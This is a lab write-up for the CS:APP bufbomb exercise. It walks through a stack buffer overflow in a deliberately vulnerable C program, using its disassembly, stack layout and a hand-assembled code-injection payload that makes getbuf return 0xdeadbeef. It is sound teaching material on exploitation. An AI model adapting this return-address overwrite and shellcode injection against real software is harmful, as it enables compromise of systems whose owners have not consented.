Buffer Overflow and Code Injection

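In this bufbomb lab we are given some C code and have to exploit a buffer overflow in it to achieve a specific goal. Let's look at the problem first.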

/* bufbomb.c
 *
 * Bomb program that is solved using a buffer overflow attack
 *
 * program for CS:APP problem 3.38
 *
 * used for CS 202 HW 8 part 2
 *
 * compile using
 *   gcc -g -O2 -Os -o bufbomb bufbomb.c
 *
 * Your task is to make getbuf return (0xdeadbeef) to test.
 */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

/* Like gets, except that characters are typed as pairs of hex digits.
   Nondigit characters are ignored.  Stops when encounters newline */
char *getxs(char *dest) {
	int c;
	int even = 1; /* Have read even number of digits */
	int otherd = 0; /* Other hex digit of pair */
	char *sp = dest;
	while ((c = getchar()) != EOF && c != '\n') {
		if (isxdigit(c)) {
			int val;
			if ('0' <= c && c <= '9')
				val = c - '0';
			else if ('A' <= c && c <= 'F')
				val = c - 'A' + 10;
			else
				val = c - 'a' + 10;
			if (even) {
				otherd = val;
				even = 0;
			} else {
				*sp++ = otherd * 16 + val;
				even = 1;
			}
		}
	}
	*sp++ = '\0';
	return dest;
}

int getbuf() {
	char buf[16];
	getxs(buf);
	return 1;
}

void test() {
	int val;
	printf("Type Hex string:");
	val = getbuf();
	printf("getbuf returned 0x%x\n", val);
}

int main() {
	int buf[16];
	/* This little hack is an attempt to get the stack to be in a
	   stable position
	*/
	int offset = (((int) buf) & 0xFFF);
	int *space = (int *) malloc(offset);
	*space = 0; /* So that don't get complaint of unused variable */
	test();
	return 0;
}

The task is stated clearly: make getbuf return 0xdeadbeef to test. As the code stands, getbuf always returns 1 no matter what input it gets, so something has to change.

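First, what getxs does: it reads hex digits from the input and writes each pair of digits into memory as one byte, skipping any non-hex characters and stopping at a newline. For example, given the input dea dbee f, it writes 0xde, 0xad, 0xbe, 0xef into the first four bytes of the buffer, followed by a terminating 00. It never checks how large the destination buffer is.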
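To see the digit pairing concretely, here is a minimal sketch of a string-based twin of getxs. parse_hex_pairs is a hypothetical name; unlike getxs it reads from a C string instead of stdin, but otherwise it follows the same rules. Like getxs, it never learns how big dest is, and that missing bound is exactly what the overflow exploits.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical string-based twin of getxs: same digit-pairing rules,
   but reads from src instead of stdin so the effect is easy to inspect.
   Returns the number of data bytes written, not counting the '\0'. */
size_t parse_hex_pairs(const char *src, unsigned char *dest)
{
    unsigned char *sp = dest;
    int even = 1;    /* have read an even number of hex digits so far */
    int otherd = 0;  /* first digit of the current pair */

    assert(src != NULL && dest != NULL);
    for (; *src != '\0' && *src != '\n'; src++) {
        int c = (unsigned char)*src;
        int val;

        if (!isxdigit(c))
            continue;                 /* spaces and other non-hex chars are skipped */
        if (isdigit(c))
            val = c - '0';
        else
            val = tolower(c) - 'a' + 10;

        if (even) {
            otherd = val;             /* remember the high nibble */
            even = 0;
        } else {
            *sp++ = (unsigned char)(otherd * 16 + val);
            even = 1;
        }
    }
    *sp = '\0';                       /* getxs always appends a terminator */
    return (size_t)(sp - dest);
}
```

Called as parse_hex_pairs("dea dbee f", out), it returns 4 and leaves de ad be ef 00 in out.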

Next, let's look at getbuf's stack layout (the highlighted part):

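You can see that buf starts at 0x0019FE3C and occupies 16 bytes, so, following the function-call sequence, the 4 bytes starting at 0x0019FE4C hold test's saved frame pointer (ebp), and 0x0019FE50 holds getbuf's return address.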

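To repeat: buf+16 holds test's saved ebp and buf+20 holds the return address. To change the flow of execution we need to change the return address, that is, overwrite buf+20 through buf+23 with the address where we want execution to continue.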
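The same layout can be written down as a C struct, as a sketch. struct getbuf_frame and ret_addr_slot are hypothetical names; the struct only models the 24 bytes from buf upward on this 32-bit build (buf at [ebp-10h], per the disassembly) and is not how the compiler actually declares the frame. The static_assert lines check the buf+16 and buf+20 offsets at compile time and assume C11 or later.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of getbuf's frame from buf upward (lowest address first),
   assuming a 32-bit target with 4-byte saved ebp and return address. */
struct getbuf_frame {
    unsigned char buf[16];  /* ebp - 0x10 .. ebp - 0x01 */
    uint32_t saved_ebp;     /* ebp + 0: test's ebp, pushed by "push ebp" */
    uint32_t ret_addr;      /* ebp + 4: pushed by "call getbuf" in test */
};

static_assert(offsetof(struct getbuf_frame, saved_ebp) == 16, "saved ebp at buf+16");
static_assert(offsetof(struct getbuf_frame, ret_addr) == 20, "return address at buf+20");

/* Address of the return-address slot, given the runtime address of buf. */
uint32_t ret_addr_slot(uint32_t buf_addr)
{
    return buf_addr + (uint32_t)offsetof(struct getbuf_frame, ret_addr);
}
```

With buf at 0x0019FE3C, the address the payload later returns to, ret_addr_slot gives 0x0019FE50.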

Now let's look at getbuf's assembly code:

48:   int getbuf() {
004011B0   push        ebp
004011B1   mov         ebp,esp
004011B3   sub         esp,50h
004011B6   push        ebx
004011B7   push        esi
004011B8   push        edi
004011B9   lea         edi,[ebp-50h]
004011BC   mov         ecx,14h
004011C1   mov         eax,0CCCCCCCCh
004011C6   rep stos    dword ptr [edi]
49:       char buf[16];
50:       getxs(buf);
004011C8   lea         eax,[ebp-10h]
004011CB   push        eax
004011CC   call        @ILT+0(getxs) (00401005)
004011D1   add         esp,4
51:       return 1;
004011D4   mov         eax,1
52:   }
004011D9   pop         edi
004011DA   pop         esi
004011DB   pop         ebx
004011DC   add         esp,50h
004011DF   cmp         ebp,esp
004011E1   call        __chkesp (00401a10)
004011E6   mov         esp,ebp
004011E8   pop         ebp
004011E9   ret

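My first idea was to skip the mov eax, 1 instruction, but on reflection that doesn't work: the stack would end up unbalanced, and it wouldn't achieve much anyway. If the instruction can't be skipped, why not override its effect? After getbuf's ret we can execute mov eax, 0xdeadbeef ourselves, which already changes the return value, and then find a way back to the normal flow of execution. How do we pull that off? Inexperienced as I am, it took me over an hour to come up with this trick.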

We can point the return address into the buffer itself, inject code into the buffer, and have it run whatever we want!

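With the idea in place, let's try it. We need to do two things: set eax, then jump to the original return address. Where is that? From the screenshot above, the original return address is 0x0040122A, the instruction in test right after the call to getbuf.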

mov eax, 0xdeadbeef
jmp 0x0040122A

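Encoding these two instructions by hand (B8 is mov eax, imm32; E9 is jmp), with the target address written directly as the jmp operand, gives this machine code: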

B8 EF BE AD DE E9 2A 12 40 00
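As a sketch of the mov half of this encoding: B8 is the opcode for mov eax, imm32, and x86 stores the 32-bit immediate least significant byte first, which is why 0xdeadbeef appears as EF BE AD DE. encode_mov_eax_imm32 and put_le32 are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store v little-endian (least significant byte first), as x86 expects
   for 32-bit immediates and displacements. */
void put_le32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)(v & 0xFF);
    out[1] = (uint8_t)((v >> 8) & 0xFF);
    out[2] = (uint8_t)((v >> 16) & 0xFF);
    out[3] = (uint8_t)((v >> 24) & 0xFF);
}

/* "mov eax, imm32" is opcode B8 followed by the 4-byte immediate.
   Returns the instruction length, which is always 5. */
size_t encode_mov_eax_imm32(uint8_t *out, uint32_t imm)
{
    assert(out != NULL);
    out[0] = 0xB8;
    put_le32(out + 1, imm);
    return 5;
}
```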

That takes 10 bytes; the remaining 6 bytes of the buffer can be filled with nop, i.e. 0x90.

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90

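The next 4 bytes are test's original ebp, which we leave unchanged. The stack view above shows 0x0019FEA4, so we copy it as is, in little-endian byte order: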

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90 A4 FE 19 00

The next 4 bytes are the return address. For our code to run, we must return to the start of the buffer, 0x0019FE3C:

B8 EF BE AD DE E9 2A 12 40 00 90 90 90 90 90 90 A4 FE 19 00 3C FE 19

Since getxs writes a 00 after the last byte it reads (here, after the 0x19), the return address's final 00 can be left out of the input.
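A small sketch of turning payload bytes into the text typed at the prompt. payload_to_input is a hypothetical helper; it drops a trailing 00 because getxs writes that byte itself. 00 bytes in the middle of the payload need no special care, since getxs parses hex text and only stops at a newline.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: format payload bytes as the space-separated hex
   string typed into bufbomb. A final 0x00 is dropped because getxs
   writes that '\0' itself after the last pair.
   Returns the string length, or 0 if out is too small. */
size_t payload_to_input(const uint8_t *p, size_t n, char *out, size_t cap)
{
    size_t len = 0;

    assert(p != NULL && out != NULL && cap > 0);
    if (n > 0 && p[n - 1] == 0x00)
        n--;                               /* let getxs supply the final 00 */
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        /* "XX" for the first byte, " XX" for every byte after it */
        int w = (i == 0)
            ? snprintf(out + len, cap - len, "%02X", (unsigned)p[i])
            : snprintf(out + len, cap - len, " %02X", (unsigned)p[i]);
        if (w < 0 || (size_t)w >= cap - len)
            return 0;                      /* would not fit */
        len += (size_t)w;
    }
    return len;
}
```

Applied to the full 24-byte overwrite (the line above plus the return address's final 00), it produces exactly the 23-byte line shown above.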
Now feed the bytes we designed into the input stream, and something strange happens.

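When the jmp instruction executes, it jumps to a strange address, 0x005A1070, where there are no valid instructions, so the CPU has nothing sensible to execute next.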

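I didn't know why at first, but guessed that the fix had to do with offsets. Subtracting 0x0040122A from this address gives 0x0019FE46, which looks like a stack address. It is in fact buf + 10, the address just past our jmp: E9 is a relative jmp, and the CPU adds its operand to the address of the next instruction, so 0x0019FE46 + 0x0040122A = 0x005A1070. The operand we actually want is therefore 0x0040122A - 0x0019FE46 = 0x002613E4.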
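The relative-jump arithmetic fits in a few lines of C, as a sketch. jmp_rel32 and jmp_target are hypothetical names; the jmp is assumed to sit at buf + 5 = 0x0019FE41, with buf at 0x0019FE3C as observed in this session.

```c
#include <assert.h>
#include <stdint.h>

#define JMP_REL32_LEN 5u  /* E9 + 4-byte displacement */

/* Where a jmp rel32 located at jmp_addr actually lands: the displacement
   is added to the address of the NEXT instruction (mod 2^32). */
uint32_t jmp_target(uint32_t jmp_addr, uint32_t rel)
{
    return jmp_addr + JMP_REL32_LEN + rel;
}

/* The displacement to encode so that a jmp at jmp_addr reaches target.
   Unsigned wrap-around yields the two's-complement offset. */
uint32_t jmp_rel32(uint32_t jmp_addr, uint32_t target)
{
    uint32_t rel = target - (jmp_addr + JMP_REL32_LEN);
    assert(jmp_target(jmp_addr, rel) == target);  /* round trip holds */
    return rel;
}
```

jmp_target(0x0019FE41, 0x0040122A) reproduces the strange 0x005A1070, and jmp_rel32(0x0019FE41, 0x0040122A) gives 0x002613E4.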
Rewritten, the input looks like this:

B8 EF BE AD DE E9 E4 13 26 00 90 90 90 90 90 90 A4 FE 19 00 3C FE 19
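To tie the steps together, here is a minimal sketch that builds the whole 24-byte overwrite from its parts. build_payload and its parameters are hypothetical names; the addresses passed in are the ones observed in this particular debugging session (buf at 0x0019FE3C, test's ebp 0x0019FEA4, return address 0x0040122A) and only hold while the stack stays where it is.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAYLOAD_LEN 24  /* buf[16] + saved ebp (4) + return address (4) */

static void put_le32(uint8_t *out, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));  /* least significant byte first */
}

/* Layout written into getbuf's frame:
     buf+0  : mov eax, retval   (B8 imm32, 5 bytes)
     buf+5  : jmp resume_addr   (E9 rel32, 5 bytes)
     buf+10 : nop padding up to buf+16
     buf+16 : test's saved ebp, written back unchanged
     buf+20 : return address = buf, so ret lands on the injected code */
void build_payload(uint8_t out[PAYLOAD_LEN], uint32_t buf_addr,
                   uint32_t saved_ebp, uint32_t resume_addr, uint32_t retval)
{
    const uint32_t jmp_addr = buf_addr + 5;

    assert(out != NULL);
    memset(out, 0x90, 16);                 /* fill buf with nop first */
    out[0] = 0xB8;                         /* mov eax, imm32 */
    put_le32(out + 1, retval);
    out[5] = 0xE9;                         /* jmp rel32, relative to buf+10 */
    put_le32(out + 6, resume_addr - (jmp_addr + 5));
    put_le32(out + 16, saved_ebp);
    put_le32(out + 20, buf_addr);
}
```

Called as build_payload(p, 0x0019FE3C, 0x0019FEA4, 0x0040122A, 0xdeadbeef), it yields the bytes above plus one final 00, which is the byte getxs writes on its own.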

It worked!